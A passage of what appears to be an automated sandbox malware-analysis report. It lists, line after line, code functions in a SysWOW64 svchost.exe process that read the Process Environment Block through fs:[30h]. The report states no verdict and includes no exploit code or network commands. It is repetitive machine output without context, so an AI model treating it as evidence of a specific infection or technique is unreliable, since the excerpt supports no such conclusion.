                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]2_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]2_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]2_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
